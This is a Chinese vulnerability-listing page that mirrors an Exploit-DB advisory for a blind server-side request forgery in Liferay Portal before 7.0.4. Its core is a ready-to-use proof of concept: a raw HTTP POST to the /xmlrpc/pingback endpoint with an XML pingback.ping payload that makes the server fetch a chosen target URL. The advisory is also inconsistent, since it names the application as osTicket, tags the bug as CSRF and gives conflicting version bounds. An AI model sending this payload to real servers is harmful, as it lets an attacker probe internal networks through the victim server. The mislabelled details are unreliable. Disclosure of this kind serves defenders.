漏洞概要

漏洞标题:
Liferay Portal < 7.0.4 – Server-Side Request Forgery

提交时间:
2018-06-26

危害等级:

相关厂商:

漏洞分类:
exp公布

关注度:
共 18 人关注

漏洞详情

EDB-ID: 44945 Author: Mehmet Ince Published: 2018-06-26
CVE: N/A Type: Webapps Platform: Java
Aliases:
N/A
Advisory/Source: N/A Tags:
Cross-Site Request Forgery (CSRF)

E-DB Verified:
<a href="javascript:void(0);" data-trigger="focus" data-toggle="popover" data-placement="top" data-content='We make an effort to verify exploits (verifty) in our labs, when possible. A “non verified” exploit (marked by a clock icon clock) simply means we did not have the opportunity to test the exploit internally.’>
Waiting verification

Exploit:

Download Exploit Code Download

/

View Raw

Vulnerable App:
N/A
1. ADVISORY INFORMATION

========================================

Title: Liferay Portal < 7.0.4 Blind Server-Side Request Forgery

Application: osTicket

Remotely Exploitable: Yes

Authentication Required: NO

Versions Affected: <= 7.0.4

Technology: Java

Vendor URL: liferay.com

Date of found: 04 December 2017

Disclosure: 25 June 2018

Author: Mehmet Ince



2. CREDIT

========================================

This vulnerability was identified during penetration test

by Mehmet INCE from PRODAFT / INVICTUS



3. Technical Details & POC

========================================

POST /xmlrpc/pingback HTTP/1.1

Host: mehmetince.dev:8080

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/47.0.2526.73 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Content-Length: 361


<?xml version="1.0" encoding="UTF-8"?>

<methodCall>

<methodName>pingback.ping</methodName>

<params>

<param>

<value>http://TARGET/</value>

</param>

<param>

<value>http://mehmetince.dev:8080/web/guest/home/-/blogs/30686</value>

</param>

</params>

</methodCall>

发表评论

电子邮件地址不会被公开。 必填项已用*标注